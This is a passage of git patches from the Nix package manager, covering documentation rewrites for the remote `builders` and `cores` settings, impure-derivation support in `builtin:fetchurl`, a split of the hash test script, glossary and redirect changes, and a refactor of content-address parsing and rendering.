-                   throw Error("unable to start any build; remote machines may not have "
-                            "all required system features."
-                            "\nhttps://nixos.org/manual/nix/stable/advanced-topics/distributed-builds.html");
+                   throw Error(
+                        R"(
+                        Unable to start any build;
+                        remote machines may not have all required system features.
+
+                        For more information run 'man nix.conf' and search for '/machines'.
+                        )"
+                    );
 
             }
             assert(!awake.empty());
diff --git a/src/libstore/globals.hh b/src/libstore/globals.hh
index 941adba78..fa2dc8681 100644
--- a/src/libstore/globals.hh
+++ b/src/libstore/globals.hh
@@ -270,9 +270,121 @@ public:
     Setting builders{
         this, "@" + nixConfDir + "/machines", "builders",
         R"(
-          A semicolon-separated list of build machines.
-          For the exact format and examples, see [the manual chapter on remote builds](../advanced-topics/distributed-builds.md)
-        )"};
+          A semicolon- or newline-separated list of build machines.
+
+          In addition to the [usual ways of setting configuration options](@docroot@/command-ref/conf-file.md), the value can be read from a file by prefixing its absolute path with `@`.
+
+          > **Example**
+          >
+          > This is the default setting:
+          >
+          > ```
+          > builders = @/etc/nix/machines
+          > ```
+
+          Each machine specification consists of the following elements, separated by spaces.
+          Only the first element is required.
+          To leave a field at its default, set it to `-`.
+
+          1. The URI of the remote store in the format `ssh://[username@]hostname`.
+
+             > **Example**
+             >
+             > `ssh://nix@mac`
+
+             For backward compatibility, `ssh://` may be omitted.
+             The hostname may be an alias defined in `~/.ssh/config`.
+
+          2. A comma-separated list of [Nix system types](@docroot@/contributing/hacking.md#system-type).
+             If omitted, this defaults to the local platform type.
+
+             > **Example**
+             >
+             > `aarch64-darwin`
+
+             It is possible for a machine to support multiple platform types.
+
+             > **Example**
+             >
+             > `i686-linux,x86_64-linux`
+
+          3. The SSH identity file to be used to log in to the remote machine.
+             If omitted, SSH will use its regular identities.
+
+             > **Example**
+             >
+             > `/home/user/.ssh/id_mac`
+
+          4. The maximum number of builds that Nix will execute in parallel on the machine.
+             Typically this should be equal to the number of CPU cores.
+
+          5. The “speed factor”, indicating the relative speed of the machine as a positive integer.
+             If there are multiple machines of the right type, Nix will prefer the fastest, taking load into account.
+
+          6. A comma-separated list of supported [system features](#conf-system-features).
+
+             A machine will only be used to build a derivation if all the features in the derivation's [`requiredSystemFeatures`](@docroot@/language/advanced-attributes.html#adv-attr-requiredSystemFeatures) attribute are supported by that machine.
+
+          7. A comma-separated list of required [system features](#conf-system-features).
+
+             A machine will only be used to build a derivation if all of the machine’s required features appear in the derivation’s [`requiredSystemFeatures`](@docroot@/language/advanced-attributes.html#adv-attr-requiredSystemFeatures) attribute.
+
+          8. The (base64-encoded) public host key of the remote machine.
+             If omitted, SSH will use its regular `known_hosts` file.
+
+             The value for this field can be obtained via `base64 -w0`.
+
+          > **Example**
+          >
+          > Multiple builders specified on the command line:
+          >
+          > ```console
+          > --builders 'ssh://mac x86_64-darwin ; ssh://beastie x86_64-freebsd'
+          > ```
+
+          > **Example**
+          >
+          > This specifies several machines that can perform `i686-linux` builds:
+          >
+          > ```
+          > nix@scratchy.labs.cs.uu.nl i686-linux /home/nix/.ssh/id_scratchy 8 1 kvm
+          > nix@itchy.labs.cs.uu.nl    i686-linux /home/nix/.ssh/id_scratchy 8 2
+          > nix@poochie.labs.cs.uu.nl  i686-linux /home/nix/.ssh/id_scratchy 1 2 kvm benchmark
+          > ```
+          >
+          > However, `poochie` will only build derivations that have the attribute
+          >
+          > ```nix
+          > requiredSystemFeatures = [ "benchmark" ];
+          > ```
+          >
+          > or
+          >
+          > ```nix
+          > requiredSystemFeatures = [ "benchmark" "kvm" ];
+          > ```
+          >
+          > `itchy` cannot do builds that require `kvm`, but `scratchy` does support such builds.
+          > For regular builds, `itchy` will be preferred over `scratchy` because it has a higher speed factor.
+
+          For Nix to use substituters, the calling user must be in the [`trusted-users`](#conf-trusted-users) list.
+
+          > **Note**
+          >
+          > A build machine must be accessible via SSH and have Nix installed.
+          > `nix` must be available in `$PATH` for the user connecting over SSH.
+
+          > **Warning**
+          >
+          > If you are building via the Nix daemon (default), the Nix daemon user account on the local machine (that is, `root`) requires access to a user account on the remote machine (not necessarily `root`).
+          >
+          > If you can’t or don’t want to configure `root` to be able to access the remote machine, set [`store`](#conf-store) to any [local store](@docroot@/store/types/local-store.html), e.g. by passing `--store /tmp` to the command on the local machine.
+
+          To build only on remote machines and disable local builds, set [`max-jobs`](#conf-max-jobs) to 0.
+
+          If you want the remote machines to use substituters, set [`builders-use-substitutes`](#conf-builders-use-substituters) to `true`.
+        )",
+        {}, false};
 
     Setting alwaysAllowSubstitutes{
         this, false, "always-allow-substitutes",

From bb63bd50e6d817e5ca52c1d1d21232164a64f993 Mon Sep 17 00:00:00 2001
From: Eelco Dolstra 
Date: Tue, 13 Feb 2024 14:14:20 +0100
Subject: [PATCH 462/654] : Restore support for "impure =
 true"

---
 src/libstore/builtins/fetchurl.cc      | 8 ++++----
 tests/functional/fetchurl.sh           | 2 +-
 tests/functional/impure-derivations.sh | 4 ++++
 3 files changed, 9 insertions(+), 5 deletions(-)

diff --git a/src/libstore/builtins/fetchurl.cc b/src/libstore/builtins/fetchurl.cc
index a9f2e748e..559efcc17 100644
--- a/src/libstore/builtins/fetchurl.cc
+++ b/src/libstore/builtins/fetchurl.cc
@@ -20,9 +20,8 @@ void builtinFetchurl(const BasicDerivation & drv, const std::string & netrcData)
     if (!out)
         throw Error("'builtin:fetchurl' requires an 'out' output");
 
-    auto dof = std::get_if(&out->raw);
-    if (!dof)
-        throw Error("'builtin:fetchurl' must be a fixed-output derivation");
+    if (!(drv.type().isFixed() || drv.type().isImpure()))
+        throw Error("'builtin:fetchurl' must be a fixed-output or impure derivation");
 
     auto getAttr = [&](const std::string & name) {
         auto i = drv.env.find(name);
@@ -67,7 +66,8 @@ void builtinFetchurl(const BasicDerivation & drv, const std::string & netrcData)
     };
 
     /* Try the hashed mirrors first. */
-    if (dof->ca.method.getFileIngestionMethod() == FileIngestionMethod::Flat)
+    auto dof = std::get_if(&out->raw);
+    if (dof && dof->ca.method.getFileIngestionMethod() == FileIngestionMethod::Flat)
         for (auto hashedMirror : settings.hashedMirrors.get())
             try {
                 if (!hasSuffix(hashedMirror, "/")) hashedMirror += '/';
diff --git a/tests/functional/fetchurl.sh b/tests/functional/fetchurl.sh
index 5a05cc5e1..a3620f52b 100644
--- a/tests/functional/fetchurl.sh
+++ b/tests/functional/fetchurl.sh
@@ -83,4 +83,4 @@ test -L $outPath/symlink
 requireDaemonNewerThan "2.20"
 expected=100
 if [[ -v NIX_DAEMON_PACKAGE ]]; then expected=1; fi # work around the daemon not returning a 100 status correctly
-expectStderr $expected nix-build --expr '{ url }: builtins.derivation { name = "nix-cache-info"; system = "x86_64-linux"; builder = "builtin:fetchurl"; inherit url; outputHashMode = "flat"; }' --argstr url file://$narxz 2>&1 | grep 'must be a fixed-output derivation'
+expectStderr $expected nix-build --expr '{ url }: builtins.derivation { name = "nix-cache-info"; system = "x86_64-linux"; builder = "builtin:fetchurl"; inherit url; outputHashMode = "flat"; }' --argstr url file://$narxz 2>&1 | grep 'must be a fixed-output or impure derivation'
diff --git a/tests/functional/impure-derivations.sh b/tests/functional/impure-derivations.sh
index 39d053a04..54ed6f5dd 100644
--- a/tests/functional/impure-derivations.sh
+++ b/tests/functional/impure-derivations.sh
@@ -63,3 +63,7 @@ path5=$(nix build -L --no-link --json --file ./impure-derivations.nix contentAdd
 path6=$(nix build -L --no-link --json --file ./impure-derivations.nix inputAddressedAfterCA | jq -r .[].outputs.out)
 [[ $(< $path6) = X ]]
 [[ $(< $TEST_ROOT/counter) = 5 ]]
+
+# Test nix/fetchurl.nix.
+path7=$(nix build -L --no-link --print-out-paths --expr "import <nix/fetchurl.nix> { impure = true; url = file://$PWD/impure-derivations.sh; }")
+cmp $path7 $PWD/impure-derivations.sh

From 39c353f6fa40a5e0ace9e2c3e69848108944845c Mon Sep 17 00:00:00 2001
From: Valentin Gagarin 
Date: Tue, 13 Feb 2024 14:52:51 +0100
Subject: [PATCH 463/654] reword description of the `cores` setting (#9522)

* reword description of the `cores` setting

- be precise about the `builder` executable
- clearly distinguish between `builder` and job parallelism
- clarify the role of `mkDerivation` in the example
- remove prose for the default, it's shown programmatically
- mention relation to `max-jobs`
---
 src/libstore/globals.hh | 23 +++++++++++++++--------
 1 file changed, 15 insertions(+), 8 deletions(-)

diff --git a/src/libstore/globals.hh b/src/libstore/globals.hh
index fa2dc8681..8330d6571 100644
--- a/src/libstore/globals.hh
+++ b/src/libstore/globals.hh
@@ -180,14 +180,21 @@ public:
         getDefaultCores(),
         "cores",
         R"(
-          Sets the value of the `NIX_BUILD_CORES` environment variable in the
-          invocation of builders. Builders can use this variable at their
-          discretion to control the maximum amount of parallelism. For
-          instance, in Nixpkgs, if the derivation attribute
-          `enableParallelBuilding` is set to `true`, the builder passes the
-          `-jN` flag to GNU Make. It can be overridden using the `--cores`
-          command line switch and defaults to `1`. The value `0` means that
-          the builder should use all available CPU cores in the system.
+          Sets the value of the `NIX_BUILD_CORES` environment variable in the [invocation of the `builder` executable](@docroot@/language/derivations.md#builder-execution) of a derivation.
+          The `builder` executable can use this variable to control its own maximum amount of parallelism.
+
+          
+          For instance, in Nixpkgs, if the attribute `enableParallelBuilding` for the `mkDerivation` build helper is set to `true`, it will pass the `-j${NIX_BUILD_CORES}` flag to GNU Make.
+
+          The value `0` means that the `builder` should use all available CPU cores in the system.
+
+          > **Note**
+          >
+          > The number of parallel local Nix build jobs is independently controlled with the [`max-jobs`](#conf-max-jobs) setting.
         )",
         {"build-cores"},
         // Don't document the machine-specific default value

From 8bebf9607cbf07fbf0f98d835f20df1f9736d5ff Mon Sep 17 00:00:00 2001
From: John Ericson 
Date: Tue, 13 Feb 2024 09:37:45 -0500
Subject: [PATCH 464/654] Split `hash.sh` test in two

Converting hashes and hashing files are pretty separate tasks, and more
test parallelism is better.
---
 tests/functional/hash-convert.sh           | 105 +++++++++++++++++++++
 tests/functional/{hash.sh => hash-path.sh} | 104 --------------------
 tests/functional/local.mk                  |   3 +-
 3 files changed, 107 insertions(+), 105 deletions(-)
 create mode 100644 tests/functional/hash-convert.sh
 rename tests/functional/{hash.sh => hash-path.sh} (51%)

diff --git a/tests/functional/hash-convert.sh b/tests/functional/hash-convert.sh
new file mode 100644
index 000000000..9b3afc10b
--- /dev/null
+++ b/tests/functional/hash-convert.sh
@@ -0,0 +1,105 @@
+source common.sh
+
+# Conversion with `nix hash` `nix-hash` and `nix hash convert`
+try3() {
+    # $1 = hash algo
+    # $2 = expected hash in base16
+    # $3 = expected hash in base32
+    # $4 = expected hash in base64
+    h64=$(nix hash convert --hash-algo "$1" --to base64 "$2")
+    [ "$h64" = "$4" ]
+    h64=$(nix-hash --type "$1" --to-base64 "$2")
+    [ "$h64" = "$4" ]
+    # Deprecated experiment
+    h64=$(nix hash to-base64 --type "$1" "$2")
+    [ "$h64" = "$4" ]
+
+    sri=$(nix hash convert --hash-algo "$1" --to sri "$2")
+    [ "$sri" = "$1-$4" ]
+    sri=$(nix-hash --type "$1" --to-sri "$2")
+    [ "$sri" = "$1-$4" ]
+    sri=$(nix hash to-sri --type "$1" "$2")
+    [ "$sri" = "$1-$4" ]
+    h32=$(nix hash convert --hash-algo "$1" --to base32 "$2")
+    [ "$h32" = "$3" ]
+    h32=$(nix-hash --type "$1" --to-base32 "$2")
+    [ "$h32" = "$3" ]
+    h32=$(nix hash to-base32 --type "$1" "$2")
+    [ "$h32" = "$3" ]
+    h16=$(nix-hash --type "$1" --to-base16 "$h32")
+    [ "$h16" = "$2" ]
+
+    h16=$(nix hash convert --hash-algo "$1" --to base16 "$h64")
+    [ "$h16" = "$2" ]
+    h16=$(nix hash to-base16 --type "$1" "$h64")
+    [ "$h16" = "$2" ]
+    h16=$(nix hash convert --to base16 "$sri")
+    [ "$h16" = "$2" ]
+    h16=$(nix hash to-base16 "$sri")
+    [ "$h16" = "$2" ]
+
+    #
+    # Converting from SRI
+    #
+
+    # Input hash algo auto-detected from SRI and output defaults to SRI as well.
+    sri=$(nix hash convert "$1-$4")
+    [ "$sri" = "$1-$4" ]
+
+    sri=$(nix hash convert --from sri "$1-$4")
+    [ "$sri" = "$1-$4" ]
+
+    sri=$(nix hash convert --to sri "$1-$4")
+    [ "$sri" = "$1-$4" ]
+
+    sri=$(nix hash convert --from sri --to sri "$1-$4")
+    [ "$sri" = "$1-$4" ]
+
+    sri=$(nix hash convert --to base64 "$1-$4")
+    [ "$sri" = "$4" ]
+
+    #
+    # Auto-detecting the input from algo and length.
+    #
+
+    sri=$(nix hash convert --hash-algo "$1" "$2")
+    [ "$sri" = "$1-$4" ]
+    sri=$(nix hash convert --hash-algo "$1" "$3")
+    [ "$sri" = "$1-$4" ]
+    sri=$(nix hash convert --hash-algo "$1" "$4")
+    [ "$sri" = "$1-$4" ]
+
+    sri=$(nix hash convert --hash-algo "$1" "$2")
+    [ "$sri" = "$1-$4" ]
+    sri=$(nix hash convert --hash-algo "$1" "$3")
+    [ "$sri" = "$1-$4" ]
+    sri=$(nix hash convert --hash-algo "$1" "$4")
+    [ "$sri" = "$1-$4" ]
+
+    #
+    # Asserting input format succeeds.
+    #
+
+    sri=$(nix hash convert --hash-algo "$1" --from base16 "$2")
+    [ "$sri" = "$1-$4" ]
+    sri=$(nix hash convert --hash-algo "$1" --from nix32 "$3")
+    [ "$sri" = "$1-$4" ]
+    sri=$(nix hash convert --hash-algo "$1" --from base64 "$4")
+    [ "$sri" = "$1-$4" ]
+
+    #
+    # Asserting input format fails.
+    #
+
+    fail=$(nix hash convert --hash-algo "$1" --from nix32 "$2" 2>&1 || echo "exit: $?")
+    [[ "$fail" == *"error: input hash"*"exit: 1" ]]
+    fail=$(nix hash convert --hash-algo "$1" --from base16 "$3" 2>&1 || echo "exit: $?")
+    [[ "$fail" == *"error: input hash"*"exit: 1" ]]
+    fail=$(nix hash convert --hash-algo "$1" --from nix32 "$4" 2>&1 || echo "exit: $?")
+    [[ "$fail" == *"error: input hash"*"exit: 1" ]]
+
+}
+
+try3 sha1 "800d59cfcd3c05e900cb4e214be48f6b886a08df" "vw46m23bizj4n8afrc0fj19wrp7mj3c0" "gA1Zz808BekAy04hS+SPa4hqCN8="
+try3 sha256 "ba7816bf8f01cfea414140de5dae2223b00361a396177a9cb410ff61f20015ad" "1b8m03r63zqhnjf7l5wnldhh7c134ap5vpj0850ymkq1iyzicy5s" "ungWv48Bz+pBQUDeXa4iI7ADYaOWF3qctBD/YfIAFa0="
+try3 sha512 "204a8fc6dda82f0a0ced7beb8e08a41657c16ef468b228a8279be331a703c33596fd15c13b1b07f9aa1d3bea57789ca031ad85c7a71dd70354ec631238ca3445" "12k9jiq29iyqm03swfsgiw5mlqs173qazm3n7daz43infy12pyrcdf30fkk3qwv4yl2ick8yipc2mqnlh48xsvvxl60lbx8vp38yji0" "IEqPxt2oLwoM7XvrjgikFlfBbvRosiioJ5vjMacDwzWW/RXBOxsH+aodO+pXeJygMa2Fx6cd1wNU7GMSOMo0RQ=="
diff --git a/tests/functional/hash.sh b/tests/functional/hash-path.sh
similarity index 51%
rename from tests/functional/hash.sh
rename to tests/functional/hash-path.sh
index ff270076e..6d096b29b 100644
--- a/tests/functional/hash.sh
+++ b/tests/functional/hash-path.sh
@@ -80,107 +80,3 @@ try2 md5 "20f3ffe011d4cfa7d72bfabef7882836"
 rm $TEST_ROOT/hash-path/hello
 ln -s x $TEST_ROOT/hash-path/hello
 try2 md5 "f78b733a68f5edbdf9413899339eaa4a"
-
-# Conversion with `nix hash` `nix-hash` and `nix hash convert`
-try3() {
-    # $1 = hash algo
-    # $2 = expected hash in base16
-    # $3 = expected hash in base32
-    # $4 = expected hash in base64
-    h64=$(nix hash convert --hash-algo "$1" --to base64 "$2")
-    [ "$h64" = "$4" ]
-    h64=$(nix-hash --type "$1" --to-base64 "$2")
-    [ "$h64" = "$4" ]
-    # Deprecated experiment
-    h64=$(nix hash to-base64 --type "$1" "$2")
-    [ "$h64" = "$4" ]
-
-    sri=$(nix hash convert --hash-algo "$1" --to sri "$2")
-    [ "$sri" = "$1-$4" ]
-    sri=$(nix-hash --type "$1" --to-sri "$2")
-    [ "$sri" = "$1-$4" ]
-    sri=$(nix hash to-sri --type "$1" "$2")
-    [ "$sri" = "$1-$4" ]
-    h32=$(nix hash convert --hash-algo "$1" --to base32 "$2")
-    [ "$h32" = "$3" ]
-    h32=$(nix-hash --type "$1" --to-base32 "$2")
-    [ "$h32" = "$3" ]
-    h32=$(nix hash to-base32 --type "$1" "$2")
-    [ "$h32" = "$3" ]
-    h16=$(nix-hash --type "$1" --to-base16 "$h32")
-    [ "$h16" = "$2" ]
-
-    h16=$(nix hash convert --hash-algo "$1" --to base16 "$h64")
-    [ "$h16" = "$2" ]
-    h16=$(nix hash to-base16 --type "$1" "$h64")
-    [ "$h16" = "$2" ]
-    h16=$(nix hash convert --to base16 "$sri")
-    [ "$h16" = "$2" ]
-    h16=$(nix hash to-base16 "$sri")
-    [ "$h16" = "$2" ]
-
-    #
-    # Converting from SRI
-    #
-
-    # Input hash algo auto-detected from SRI and output defaults to SRI as well.
-    sri=$(nix hash convert "$1-$4")
-    [ "$sri" = "$1-$4" ]
-
-    sri=$(nix hash convert --from sri "$1-$4")
-    [ "$sri" = "$1-$4" ]
-
-    sri=$(nix hash convert --to sri "$1-$4")
-    [ "$sri" = "$1-$4" ]
-
-    sri=$(nix hash convert --from sri --to sri "$1-$4")
-    [ "$sri" = "$1-$4" ]
-
-    sri=$(nix hash convert --to base64 "$1-$4")
-    [ "$sri" = "$4" ]
-
-    #
-    # Auto-detecting the input from algo and length.
-    #
-
-    sri=$(nix hash convert --hash-algo "$1" "$2")
-    [ "$sri" = "$1-$4" ]
-    sri=$(nix hash convert --hash-algo "$1" "$3")
-    [ "$sri" = "$1-$4" ]
-    sri=$(nix hash convert --hash-algo "$1" "$4")
-    [ "$sri" = "$1-$4" ]
-
-    sri=$(nix hash convert --hash-algo "$1" "$2")
-    [ "$sri" = "$1-$4" ]
-    sri=$(nix hash convert --hash-algo "$1" "$3")
-    [ "$sri" = "$1-$4" ]
-    sri=$(nix hash convert --hash-algo "$1" "$4")
-    [ "$sri" = "$1-$4" ]
-
-    #
-    # Asserting input format succeeds.
-    #
-
-    sri=$(nix hash convert --hash-algo "$1" --from base16 "$2")
-    [ "$sri" = "$1-$4" ]
-    sri=$(nix hash convert --hash-algo "$1" --from nix32 "$3")
-    [ "$sri" = "$1-$4" ]
-    sri=$(nix hash convert --hash-algo "$1" --from base64 "$4")
-    [ "$sri" = "$1-$4" ]
-
-    #
-    # Asserting input format fails.
-    #
-
-    fail=$(nix hash convert --hash-algo "$1" --from nix32 "$2" 2>&1 || echo "exit: $?")
-    [[ "$fail" == *"error: input hash"*"exit: 1" ]]
-    fail=$(nix hash convert --hash-algo "$1" --from base16 "$3" 2>&1 || echo "exit: $?")
-    [[ "$fail" == *"error: input hash"*"exit: 1" ]]
-    fail=$(nix hash convert --hash-algo "$1" --from nix32 "$4" 2>&1 || echo "exit: $?")
-    [[ "$fail" == *"error: input hash"*"exit: 1" ]]
-
-}
-
-try3 sha1 "800d59cfcd3c05e900cb4e214be48f6b886a08df" "vw46m23bizj4n8afrc0fj19wrp7mj3c0" "gA1Zz808BekAy04hS+SPa4hqCN8="
-try3 sha256 "ba7816bf8f01cfea414140de5dae2223b00361a396177a9cb410ff61f20015ad" "1b8m03r63zqhnjf7l5wnldhh7c134ap5vpj0850ymkq1iyzicy5s" "ungWv48Bz+pBQUDeXa4iI7ADYaOWF3qctBD/YfIAFa0="
-try3 sha512 "204a8fc6dda82f0a0ced7beb8e08a41657c16ef468b228a8279be331a703c33596fd15c13b1b07f9aa1d3bea57789ca031ad85c7a71dd70354ec631238ca3445" "12k9jiq29iyqm03swfsgiw5mlqs173qazm3n7daz43infy12pyrcdf30fkk3qwv4yl2ick8yipc2mqnlh48xsvvxl60lbx8vp38yji0" "IEqPxt2oLwoM7XvrjgikFlfBbvRosiioJ5vjMacDwzWW/RXBOxsH+aodO+pXeJygMa2Fx6cd1wNU7GMSOMo0RQ=="
diff --git a/tests/functional/local.mk b/tests/functional/local.mk
index f369c7c2c..18eb887cd 100644
--- a/tests/functional/local.mk
+++ b/tests/functional/local.mk
@@ -47,7 +47,8 @@ nix_tests = \
   optimise-store.sh \
   substitute-with-invalid-ca.sh \
   signing.sh \
-  hash.sh \
+  hash-convert.sh \
+  hash-path.sh \
   gc-non-blocking.sh \
   check.sh \
   nix-shell.sh \

From 5b69409f6b479ff28870c0502682882ee14a9dc8 Mon Sep 17 00:00:00 2001
From: Valentin Gagarin 
Date: Tue, 13 Feb 2024 16:08:44 +0100
Subject: [PATCH 465/654] only refer to the local store page

---
 doc/manual/src/glossary.md | 4 ----
 1 file changed, 4 deletions(-)

diff --git a/doc/manual/src/glossary.md b/doc/manual/src/glossary.md
index 51f1e3a71..6126b7e47 100644
--- a/doc/manual/src/glossary.md
+++ b/doc/manual/src/glossary.md
@@ -68,10 +68,6 @@
 
 - [local store]{#gloss-local-store}
 
-  From the perspective of the location where Nix is invoked, the Nix [store] can be referred to _local_ or _remote_.
-  Only a local store exposes a file system directory, typically `/nix/store`, to allow operating system processes to directly access store objects.
-  Local stores can be used for building [derivations][derivation].
-
   See [Local Store](@docroot@/command-ref/new-cli/nix3-help-stores.md#local-store) for details.
 
   [local store]: #gloss-local-store

From bb2189235100a551ab416ff301bef6efd3adbc66 Mon Sep 17 00:00:00 2001
From: Eelco Dolstra 
Date: Wed, 7 Feb 2024 15:41:10 +0100
Subject: [PATCH 466/654] *.in files: Depend on config.status

---
 mk/templates.mk | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)

diff --git a/mk/templates.mk b/mk/templates.mk
index 866bdc17f..d5dae61c7 100644
--- a/mk/templates.mk
+++ b/mk/templates.mk
@@ -10,10 +10,10 @@ endef
 
 ifneq ($(MAKECMDGOALS), clean)
 
-$(buildprefix)%.h: %.h.in
+$(buildprefix)%.h: %.h.in $(buildprefix)config.status
 	$(trace-gen) rm -f $@ && cd $(buildprefixrel) && ./config.status --quiet --header=$(@:$(buildprefix)%=%)
 
-$(buildprefix)%: %.in
+$(buildprefix)%: %.in $(buildprefix)config.status
 	$(trace-gen) rm -f $@ && cd $(buildprefixrel) && ./config.status --quiet --file=$(@:$(buildprefix)%=%)
 
 endif

From f27205f743fcfd05126f5fa7cc83eefea7873f1f Mon Sep 17 00:00:00 2001
From: Valentin Gagarin 
Date: Tue, 13 Feb 2024 16:25:07 +0100
Subject: [PATCH 467/654] redirect local and chroot store to main page

---
 doc/manual/redirects.js    |  6 +++++-
 doc/manual/src/glossary.md | 11 +----------
 2 files changed, 6 insertions(+), 11 deletions(-)

diff --git a/doc/manual/redirects.js b/doc/manual/redirects.js
index d04f32b49..e25b17c76 100644
--- a/doc/manual/redirects.js
+++ b/doc/manual/redirects.js
@@ -358,7 +358,11 @@ const redirects = {
     "one-time-setup": "testing.html#one-time-setup",
     "using-the-ci-generated-installer-for-manual-testing": "testing.html#using-the-ci-generated-installer-for-manual-testing",
     "characterization-testing": "#characterisation-testing-unit",
-  }
+  },
+  "glossary.html": {
+    "gloss-local-store": "store/types/local-store.html",
+    "gloss-chroot-store": "store/types/local-store.html",
+  },
 };
 
 // the following code matches the current page's URL against the set of redirects.
diff --git a/doc/manual/src/glossary.md b/doc/manual/src/glossary.md
index 6126b7e47..d257a8189 100644
--- a/doc/manual/src/glossary.md
+++ b/doc/manual/src/glossary.md
@@ -66,16 +66,6 @@
 
   [store]: #gloss-store
 
-- [local store]{#gloss-local-store}
-
-  See [Local Store](@docroot@/command-ref/new-cli/nix3-help-stores.md#local-store) for details.
-
-  [local store]: #gloss-local-store
-
-- [chroot store]{#gloss-chroot-store}
-
-  A [local store] whose canonical path is anything other than `/nix/store`.
-
 - [binary cache]{#gloss-binary-cache}
 
   A *binary cache* is a Nix store which uses a different format: its
@@ -242,6 +232,7 @@
   - All paths in the store path's [closure] are valid.
 
   [validity]: #gloss-validity
+  [local store]: @docroot@/store/types/local-store.md
 
 - [user environment]{#gloss-user-env}
 

From 41dd9857c7dbd8a2df9c8da4b7cf8e0399088452 Mon Sep 17 00:00:00 2001
From: John Ericson 
Date: Tue, 13 Feb 2024 09:54:07 -0500
Subject: [PATCH 468/654] Proper `parse` and `render` functions for
 `FileIngestionMethod` and `ContentAddressMethod`

No outward facing behavior is changed.

Older methods with the same names that operate on a method + algo pair (for
old-style `<method>:<algo>`) are renamed to `*WithAlgo`.

The functions are unit-tested in the same way the names for the hash
algorithms are tested.
---
 src/libstore/content-address.cc            | 31 +++++++++++++++----
 src/libstore/content-address.hh            | 22 +++++++++++---
 src/libstore/daemon.cc                     |  2 +-
 src/libstore/derivations.cc                | 12 ++++----
 src/libstore/remote-store.cc               |  2 +-
 src/libutil/file-content-address.cc        | 25 ++++++++++++++++
 src/libutil/file-content-address.hh        | 17 +++++++++++
 src/nix/add-to-store.cc                    | 13 +-------
 tests/unit/libstore/content-address.cc     | 35 ++++++++++++++++++++++
 tests/unit/libutil/file-content-address.cc | 33 ++++++++++++++++++++
 10 files changed, 162 insertions(+), 30 deletions(-)
 create mode 100644 tests/unit/libstore/content-address.cc
 create mode 100644 tests/unit/libutil/file-content-address.cc

diff --git a/src/libstore/content-address.cc b/src/libstore/content-address.cc
index fc408f5af..2091f8e02 100644
--- a/src/libstore/content-address.cc
+++ b/src/libstore/content-address.cc
@@ -4,7 +4,7 @@
 
 namespace nix {
 
-std::string makeFileIngestionPrefix(FileIngestionMethod m)
+std::string_view makeFileIngestionPrefix(FileIngestionMethod m)
 {
     switch (m) {
     case FileIngestionMethod::Flat:
@@ -16,10 +16,29 @@ std::string makeFileIngestionPrefix(FileIngestionMethod m)
     }
 }
 
-std::string ContentAddressMethod::renderPrefix() const
+std::string_view ContentAddressMethod::render() const
 {
     return std::visit(overloaded {
-        [](TextIngestionMethod) -> std::string { return "text:"; },
+        [](TextIngestionMethod) -> std::string_view { return "text"; },
+        [](FileIngestionMethod m2) {
+             /* Not prefixed for back compat with things that couldn't produce text before. */
+            return renderFileIngestionMethod(m2);
+        },
+    }, raw);
+}
+
+ContentAddressMethod ContentAddressMethod::parse(std::string_view m)
+{
+    if (m == "text")
+        return TextIngestionMethod {};
+    else
+        return parseFileIngestionMethod(m);
+}
+
+std::string_view ContentAddressMethod::renderPrefix() const
+{
+    return std::visit(overloaded {
+        [](TextIngestionMethod) -> std::string_view { return "text:"; },
         [](FileIngestionMethod m2) {
              /* Not prefixed for back compat with things that couldn't produce text before. */
             return makeFileIngestionPrefix(m2);
@@ -38,7 +57,7 @@ ContentAddressMethod ContentAddressMethod::parsePrefix(std::string_view & m)
     return FileIngestionMethod::Flat;
 }
 
-std::string ContentAddressMethod::render(HashAlgorithm ha) const
+std::string ContentAddressMethod::renderWithAlgo(HashAlgorithm ha) const
 {
     return std::visit(overloaded {
         [&](const TextIngestionMethod & th) {
@@ -133,7 +152,7 @@ ContentAddress ContentAddress::parse(std::string_view rawCa)
     };
 }
 
-std::pair<ContentAddressMethod, HashAlgorithm> ContentAddressMethod::parse(std::string_view caMethod)
+std::pair<ContentAddressMethod, HashAlgorithm> ContentAddressMethod::parseWithAlgo(std::string_view caMethod)
 {
     std::string asPrefix = std::string{caMethod} + ":";
     // parseContentAddressMethodPrefix takes its argument by reference
@@ -155,7 +174,7 @@ std::string renderContentAddress(std::optional ca)
 
 std::string ContentAddress::printMethodAlgo() const
 {
-    return method.renderPrefix()
+    return std::string { method.renderPrefix() }
         + printHashAlgo(hash.algo);
 }
 
diff --git a/src/libstore/content-address.hh b/src/libstore/content-address.hh
index f0973412b..80538df50 100644
--- a/src/libstore/content-address.hh
+++ b/src/libstore/content-address.hh
@@ -36,7 +36,7 @@ struct TextIngestionMethod : std::monostate { };
  * Compute the prefix to the hash algorithm which indicates how the
  * files were ingested.
  */
-std::string makeFileIngestionPrefix(FileIngestionMethod m);
+std::string_view makeFileIngestionPrefix(FileIngestionMethod m);
 
 /**
  * An enumeration of all the ways we can content-address store objects.
@@ -59,6 +59,20 @@ struct ContentAddressMethod
 
     MAKE_WRAPPER_CONSTRUCTOR(ContentAddressMethod);
 
+    /**
+     * Parse a content addressing method (name).
+     *
+     * The inverse of `render`.
+     */
+    static ContentAddressMethod parse(std::string_view rawCaMethod);
+
+    /**
+     * Render a content addressing method (name).
+     *
+     * The inverse of `parse`.
+     */
+    std::string_view render() const;
+
     /**
      * Parse the prefix tag which indicates how the files
      * were ingested, with the fixed output case not prefixed for back
@@ -74,12 +88,12 @@ struct ContentAddressMethod
      *
      * The rough inverse of `parsePrefix()`.
      */
-    std::string renderPrefix() const;
+    std::string_view renderPrefix() const;
 
     /**
      * Parse a content addressing method and hash type.
      */
-    static std::pair<ContentAddressMethod, HashAlgorithm> parse(std::string_view rawCaMethod);
+    static std::pair<ContentAddressMethod, HashAlgorithm> parseWithAlgo(std::string_view rawCaMethod);
 
     /**
      * Render a content addressing method and hash type in a
@@ -87,7 +101,7 @@ struct ContentAddressMethod
      *
      * The rough inverse of `parse()`.
      */
-    std::string render(HashAlgorithm ht) const;
+    std::string renderWithAlgo(HashAlgorithm ht) const;
 
     /**
      * Get the underlying way to content-address file system objects.
diff --git a/src/libstore/daemon.cc b/src/libstore/daemon.cc
index 8db93fa39..cf5020dfe 100644
--- a/src/libstore/daemon.cc
+++ b/src/libstore/daemon.cc
@@ -400,7 +400,7 @@ static void performOp(TunnelLogger * logger, ref store,
             logger->startWork();
             auto pathInfo = [&]() {
                 // NB: FramedSource must be out of scope before logger->stopWork();
-                auto [contentAddressMethod, hashAlgo_] = ContentAddressMethod::parse(camStr);
+                auto [contentAddressMethod, hashAlgo_] = ContentAddressMethod::parseWithAlgo(camStr);
